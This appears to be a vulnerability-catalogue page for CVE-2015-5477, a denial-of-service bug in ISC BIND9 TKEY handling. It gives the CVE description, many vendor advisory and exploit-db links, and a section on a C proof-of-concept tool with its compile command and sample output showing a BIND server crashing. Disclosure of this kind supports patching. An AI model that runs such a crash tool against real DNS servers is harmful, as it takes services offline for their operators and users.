Vulnonym.com

CVE-2015-5477 - Dividual Boxes

Description

named in ISC BIND 9.x before 9.9.7-P2 and 9.10.x before 9.10.2-P3 allows remote attackers to cause a denial of service (REQUIRE assertion failure and daemon exit) via TKEY queries.

Reference

https://kb.isc.org/article/AA-01272
http://www.debian.org/security/2015/dsa-3319
http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00048.html
http://rhn.redhat.com/errata/RHSA-2015-1515.html
http://rhn.redhat.com/errata/RHSA-2015-1513.html
http://rhn.redhat.com/errata/RHSA-2015-1514.html
http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00044.html
http://lists.opensuse.org/opensuse-security-announce/2015-08/msg00001.html
http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00045.html
http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00043.html
http://www.ubuntu.com/usn/USN-2693-1
http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00050.html
https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05095918
http://marc.info/?l=bugtraq&m=144181171013996&w=2
http://marc.info/?l=bugtraq&m=144000632319155&w=2
http://marc.info/?l=bugtraq&m=144294073801304&w=2
http://marc.info/?l=bugtraq&m=144017354030745&w=2
http://www.oracle.com/technetwork/topics/security/ovmbulletinjul2016-3090546.html
http://www.oracle.com/technetwork/topics/security/bulletinjul2015-2511963.html
http://www.securityfocus.com/bid/76092
http://rhn.redhat.com/errata/RHSA-2016-0078.html
http://rhn.redhat.com/errata/RHSA-2016-0079.html
http://kb.juniper.net/InfoCenter/index?page=content&id=JSA10718
https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04952480
http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00033.html
https://kb.isc.org/article/AA-01306
https://security.gentoo.org/glsa/201510-01
https://kc.mcafee.com/corporate/index?page=content&id=SB10126
https://kb.isc.org/article/AA-01305
https://kb.isc.org/article/AA-01307
https://support.apple.com/kb/HT205032
https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04789415
https://www.exploit-db.com/exploits/37723/
http://www.securitytracker.com/id/1033100
http://packetstormsecurity.com/files/132926/BIND-TKEY-Query-Denial-Of-Service.html
http://lists.fedoraproject.org/pipermail/package-announce/2015-August/163015.html
http://lists.fedoraproject.org/pipermail/package-announce/2015-August/163007.html
http://lists.fedoraproject.org/pipermail/package-announce/2015-August/163006.html
https://kb.isc.org/article/AA-01438
https://kb.juniper.net/JSA10783
https://www.exploit-db.com/exploits/37721/
https://security.netapp.com/advisory/ntap-20160114-0001/

Exploit

PoC for BIND9 TKEY assert DoS (CVE-2015-5477)

This exploit tests whether a BIND9 server is vulnerable by sending the exploit packet and checking whether the server crashes.

It's C code that you compile the normal way on Unix/Windows, such as:

# gcc tkill.c -o tkill

It’ll run over both IPv4 and IPv6.

This is what it looks like running against localhost. Since resolving the name yields two IP addresses, it tries both of them. For each address it first queries the "version" string, then sends the exploit. When it probes the second address, the version query fails because the service already crashed during the first attempt.

root@kali:~/cve-2015-5477# ./a.out localhost
--- PoC for CVE-2015-5477 BIND9 TKEY assert DoS ---
[+] localhost: Resolving to IP address
[+] localhost: Resolved to multiple IPs (NOTE)
[+] ::1: Probing...
[+] Querying version...
[+] ::1: "9.11.0pre-alpha"
[+] Sending DoS packet...
[+] Waiting 5-sec for response...
[+] timed out, probably crashed

[+] 127.0.0.1: Probing...
[+] Querying version...
[-] timed out getting version, trying again
[-] timed out getting version, trying again
[-] timed out getting version, trying again
[-] Can't query server, is it crashed already?
[-] Sending exploit anyway.
[+] Sending DoS packet...
[+] Waiting 5-sec for response...
[+] timed out, probably crashed